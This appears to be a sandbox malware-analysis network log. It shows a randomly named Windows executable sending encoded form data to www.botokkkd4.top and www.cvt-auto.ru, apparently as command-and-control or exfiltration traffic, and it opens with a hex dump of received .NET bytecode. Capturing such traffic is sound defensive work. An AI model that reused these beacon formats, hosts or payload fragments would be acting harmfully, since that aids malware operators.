                                                  Jul 1, 2024 19:26:06.499871016 CEST1236INData Raw: 2e 00 00 04 6f 24 00 00 0a 6f 25 00 00 0a 26 06 6f 68 00 00 0a 26 02 7b 18 00 00 04 6f 1e 00 00 0a 00 72 12 07 00 70 72 8f 05 00 70 16 1f 40 28 69 00 00 0a 26 02 28 06 00 00 06 00 2a 13 30 04 00 8c 00 00 00 00 00 00 00 00 02 7b 28 00 00 04 72 48
                                                  Data Ascii: .o$o%&oh&{orprp@(i&(*0{(rHpo){&rHpo){$rHpo){"rHpo){ rHpo){,rHpo){.rHpo)rJprp@(i&*0sok*0
                                                  Jul 1, 2024 19:26:06.499907017 CEST1236INData Raw: 00 0a 00 02 7b 1b 00 00 04 20 df 00 00 00 1f 31 73 3d 00 00 0a 6f 3e 00 00 0a 00 02 7b 1b 00 00 04 1f 23 6f 3f 00 00 0a 00 02 7b 1b 00 00 04 72 d2 07 00 70 6f 29 00 00 0a 00 02 7b 1b 00 00 04 16 6f 78 00 00 0a 00 02 7b 1b 00 00 04 02 fe 06 0f 00
                                                  Data Ascii: { 1s=o>{#o?{rpo){ox{sOoy{({o7{(woY{ s:o;{rpo<{ 1s=o>{"o?((|rp~}rp(~
                                                  Jul 1, 2024 19:26:06.499943972 CEST1236INData Raw: 3f 00 00 0a 00 02 7b 23 00 00 04 72 e8 08 00 70 6f 29 00 00 0a 00 02 7b 24 00 00 04 20 07 01 00 00 20 49 01 00 00 73 3a 00 00 0a 6f 3b 00 00 0a 00 02 7b 24 00 00 04 72 fa 08 00 70 6f 3c 00 00 0a 00 02 7b 24 00 00 04 20 93 00 00 00 1f 22 73 3d 00
                                                  Data Ascii: ?{#rpo){$ Is:o;{$rpo<{$ "s=o>{$o?{%oQ{%(oY{% s:o;{%rpo<{%ns=o>{%o?{%rpo){& I
                                                  Jul 1, 2024 19:26:06.499979019 CEST1236INData Raw: 00 00 20 c6 00 00 00 73 3a 00 00 0a 6f 3b 00 00 0a 00 02 7b 2e 00 00 04 72 a8 09 00 70 6f 3c 00 00 0a 00 02 7b 2e 00 00 04 20 2c 01 00 00 1f 22 73 3d 00 00 0a 6f 3e 00 00 0a 00 02 7b 2e 00 00 04 1f 29 6f 3f 00 00 0a 00 02 7b 2f 00 00 04 17 6f 51
                                                  Data Ascii: s:o;{.rpo<{. ,"s=o>{.)o?{/oQ{/(oY{/ < s:o;{/ripo<{/ s=o>{/(o?{/rpo){0(o7{0(woY{0
                                                  Jul 1, 2024 19:26:06.500016928 CEST1236INData Raw: 2c 22 00 72 9a 0a 00 70 d0 06 00 00 02 28 98 00 00 0a 6f 99 00 00 0a 73 9a 00 00 0a 0b 07 80 33 00 00 04 00 7e 33 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00 00 00 0a 00 00 11 00 7e 34 00 00 04 0a 2b 00 06 2a 22 00 02 80 34 00 00 04 2a 13
                                                  Data Ascii: ,"rp(os3~3+*0~4+*"4*0!(rp~4ot0+*0~5+*"(*Vs (t5*"(*{6*"}6*{7*"}7*{8*"}8*
                                                  Jul 1, 2024 19:26:06.505762100 CEST1236INData Raw: 00 0a 6f 3e 00 00 0a 00 02 7b 48 00 00 04 19 6f 3f 00 00 0a 00 02 7b 48 00 00 04 02 fe 06 45 00 00 06 73 a7 00 00 0a 6f a8 00 00 0a 00 02 7b 49 00 00 04 20 a7 00 00 00 20 ce 00 00 00 73 3a 00 00 0a 6f 3b 00 00 0a 00 02 7b 49 00 00 04 72 b7 0c 00
                                                  Data Ascii: o>{Ho?{HEso{I s:o;{Irpo<{Iy&s=o>{Io?{Irpo){Iox{ICsOoy{JoQ{Jrup"@AsoW{J(oY{J


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  26192.168.2.76448143.198.80.127806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:11.611465931 CEST719OUTPOST /i6sl/ HTTP/1.1
                                                  Host: www.botokkkd4.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.botokkkd4.top
                                                  Referer: http://www.botokkkd4.top/i6sl/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 6e 75 45 6e 46 6c 37 49 6c 53 35 54 43 77 4d 34 36 42 64 71 43 68 58 68 6a 67 4c 4d 31 5a 72 69 52 54 79 72 38 45 4b 77 4c 47 42 36 65 6f 66 73 58 36 54 43 4b 77 6b 6c 6f 75 2b 44 62 4a 6b 4f 39 64 71 6d 4e 55 52 64 33 58 7a 55 47 71 72 62 4b 6d 6f 48 59 4a 43 69 67 6d 2b 68 4c 52 4d 66 2f 65 46 34 65 53 30 6c 48 6b 50 4e 46 4c 57 4d 32 78 57 57 6f 61 6a 61 74 6a 73 58 4a 54 4c 79 46 59 4f 66 67 73 61 4a 6e 53 6b 32 2f 59 2f 2f 4c 30 42 5a 63 6d 2b 33 4c 4e 48 35 57 30 42 4b 67 36 32 31 52 6a 51 56 2b 43 2b 30 74 52 79 79 70 66 2b 58 79 78 51 70 61 32 7a 4e 36 58 56 76 4e 46 51 4b 57 30 79 4a 4e 68 36 31 43 61 67 4c 58 67 3d 3d
                                                  Data Ascii: FTP84=nuEnFl7IlS5TCwM46BdqChXhjgLM1ZriRTyr8EKwLGB6eofsX6TCKwklou+DbJkO9dqmNURd3XzUGqrbKmoHYJCigm+hLRMf/eF4eS0lHkPNFLWM2xWWoajatjsXJTLyFYOfgsaJnSk2/Y//L0BZcm+3LNH5W0BKg621RjQV+C+0tRyypf+XyxQpa2zN6XVvNFQKW0yJNh61CagLXg==
                                                  Jul 1, 2024 19:26:12.484647036 CEST1236INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 01 Jul 2024 17:26:12 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:26:12.484669924 CEST189INData Raw: 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64
                                                  Data Ascii: ry not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  27192.168.2.76448243.198.80.127806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:14.148614883 CEST739OUTPOST /i6sl/ HTTP/1.1
                                                  Host: www.botokkkd4.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.botokkkd4.top
                                                  Referer: http://www.botokkkd4.top/i6sl/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 6e 75 45 6e 46 6c 37 49 6c 53 35 54 51 6a 45 34 38 6d 78 71 44 42 58 69 76 41 4c 4d 2f 35 72 6d 52 54 4f 72 38 46 4f 67 4d 77 52 36 66 4d 54 73 57 37 54 43 4c 77 6b 6c 67 4f 2b 47 55 70 6b 52 39 64 6d 45 4e 57 46 64 33 58 50 55 47 72 62 62 4b 78 30 47 5a 5a 43 38 6f 47 2b 6a 55 68 4d 66 2f 65 46 34 65 53 4a 41 48 6b 48 4e 46 36 6d 4d 35 30 69 56 67 36 6a 62 6c 44 73 58 65 44 4b 35 46 59 4f 39 67 70 7a 55 6e 51 63 32 2f 5a 50 2f 4c 6c 42 61 54 6d 2b 78 55 64 48 75 5a 6b 4e 45 36 59 6a 58 59 30 68 4b 2f 42 43 67 6f 6e 76 51 7a 39 79 37 73 67 6f 53 65 30 58 37 74 78 49 61 50 45 55 53 62 57 47 6f 53 57 66 66 50 49 42 50 42 55 30 77 66 6f 41 31 78 48 34 69 4e 79 37 57 6b 4b 61 42 69 64 55 3d
                                                  Data Ascii: FTP84=nuEnFl7IlS5TQjE48mxqDBXivALM/5rmRTOr8FOgMwR6fMTsW7TCLwklgO+GUpkR9dmENWFd3XPUGrbbKx0GZZC8oG+jUhMf/eF4eSJAHkHNF6mM50iVg6jblDsXeDK5FYO9gpzUnQc2/ZP/LlBaTm+xUdHuZkNE6YjXY0hK/BCgonvQz9y7sgoSe0X7txIaPEUSbWGoSWffPIBPBU0wfoA1xH4iNy7WkKaBidU=
                                                  Jul 1, 2024 19:26:15.038206100 CEST1236INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 01 Jul 2024 17:26:15 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:26:15.038253069 CEST189INData Raw: 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64
                                                  Data Ascii: ry not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  28192.168.2.76448343.198.80.127806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:16.690655947 CEST1752OUTPOST /i6sl/ HTTP/1.1
                                                  Host: www.botokkkd4.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.botokkkd4.top
                                                  Referer: http://www.botokkkd4.top/i6sl/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 6e 75 45 6e 46 6c 37 49 6c 53 35 54 51 6a 45 34 38 6d 78 71 44 42 58 69 76 41 4c 4d 2f 35 72 6d 52 54 4f 72 38 46 4f 67 4d 77 5a 36 65 35 50 73 57 63 48 43 4d 77 6b 6c 71 75 2b 48 55 70 6c 4e 39 63 4f 41 4e 57 4a 53 33 52 44 55 55 5a 54 62 66 7a 63 47 58 5a 43 38 6b 6d 2b 67 4c 52 4d 47 2f 61 5a 30 65 57 70 41 48 6b 48 4e 46 35 2b 4d 2b 68 57 56 6d 36 6a 61 74 6a 73 4c 4a 54 4c 65 46 63 69 48 67 70 32 6a 6e 67 38 32 2f 35 66 2f 4f 58 70 61 61 6d 2b 4a 56 64 47 72 5a 6b 41 47 36 59 2b 37 59 78 63 68 2f 43 53 67 70 43 79 79 6a 4e 2b 37 35 47 6f 4e 66 57 47 5a 36 78 59 53 46 44 34 35 55 58 69 38 52 6d 76 44 44 4f 6c 69 4d 6c 4a 4e 49 4a 59 61 39 6a 64 78 44 56 75 6b 38 4b 36 78 67 64 55 4a 58 77 4c 4f 67 4f 5a 63 66 61 74 75 31 76 42 48 68 2b 6a 37 76 71 6a 4d 39 57 58 5a 4a 73 7a 52 61 70 69 4e 53 39 54 45 65 66 50 42 4d 62 56 79 73 5a 65 4d 44 33 6d 72 70 76 41 6b 61 46 66 35 76 48 76 6b 66 74 4f 37 78 4e 4b 71 2b 69 33 6d 74 73 55 72 56 51 4f 41 62 74 31 64 37 4b 69 64 46 45 6f 5a [TRUNCATED]
                                                  Data Ascii: FTP84=nuEnFl7IlS5TQjE48mxqDBXivALM/5rmRTOr8FOgMwZ6e5PsWcHCMwklqu+HUplN9cOANWJS3RDUUZTbfzcGXZC8km+gLRMG/aZ0eWpAHkHNF5+M+hWVm6jatjsLJTLeFciHgp2jng82/5f/OXpaam+JVdGrZkAG6Y+7Yxch/CSgpCyyjN+75GoNfWGZ6xYSFD45UXi8RmvDDOliMlJNIJYa9jdxDVuk8K6xgdUJXwLOgOZcfatu1vBHh+j7vqjM9WXZJszRapiNS9TEefPBMbVysZeMD3mrpvAkaFf5vHvkftO7xNKq+i3mtsUrVQOAbt1d7KidFEoZ8ibK3Seyaj+7CAJDToDxJnTI2o8Rtm0kTmZtXDhfNkzobjVyoO0BGiUdkI5EK0rlVGOqYpyIA5l9kjHYlNeQekJfU8xyOtxnBM24FQaPJdKH3E1tu0ZRpZVI7vJ5QgFDhivQyjq+SVTDM6rSRsm94o//It4ZQzHGJJe+Mo2hs5XEw3uFbenVu9EtexW+5tBGQagZD6TkZtEG4hfZhsxFA1nBp0EANWwq5eK1VHf2nDGWhCO0ewoek5zLnyRoJjc8vlWu645XFquCqNEoYx3VKg01xGpuP3+LMZ8JhAq7U7FiUOrH10m+UAVVRnXK1E2JpzH81WRZji0IwmHMmekxV9tGbunLZH3hsAraB/9u2Y+STx1zndLTHySJE4nSjObN4SjNDsKQHU0u5zAZucZxLOXIbeuZAlu7VGcy6S/yB5qTzG5uyM91mTg38rPTKu4XoNy7V+mbZiiZqCX1Q34omk+28ycbQEhYiLZcF4R44ULi+oVYert397ZptAPCUZTYlTIuCjdU6WsiLVt/BWhEMwk2ebcX3A8KZqedsxv5AuZqnSt+sH2aKQQmB9Hf4tsh6AYThfTIXUAgEReAoNFB2CrbpwpHAEANMgvHsCW+2QJVknT/29UYCEObFawQf6D91pcWd5bT1LRIrgxj0uX3g8Awp2/Hf9levt [TRUNCATED]
                                                  Jul 1, 2024 19:26:17.580858946 CEST1236INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 01 Jul 2024 17:26:17 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:26:17.580935955 CEST189INData Raw: 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64
                                                  Data Ascii: ry not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  29192.168.2.76448443.198.80.127806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:19.230746031 CEST456OUTGET /i6sl/?Lb=GFtlIrHx8T50&FTP84=qssHGV29j0ZCAjpN6QtzDw+gnCiynPmFES/c0m6mTWJ8eKXYeJPjMTEVk7GvbqhDwPeBMRZatQ3ofr/5XjUfaZC8rCPfXyoknOgmUV1BLU/3HLT18Q+LgoHdoh8bcR/ofs2EqraVghMO HTTP/1.1
                                                  Host: www.botokkkd4.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:26:20.122318983 CEST1236INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 01 Jul 2024 17:26:20 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                  Jul 1, 2024 19:26:20.122387886 CEST189INData Raw: 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64
                                                  Data Ascii: ry not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  30192.168.2.76448545.130.41.249806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:25.502549887 CEST713OUTPOST /1cpo/ HTTP/1.1
                                                  Host: www.cvt-auto.ru
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.cvt-auto.ru
                                                  Referer: http://www.cvt-auto.ru/1cpo/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
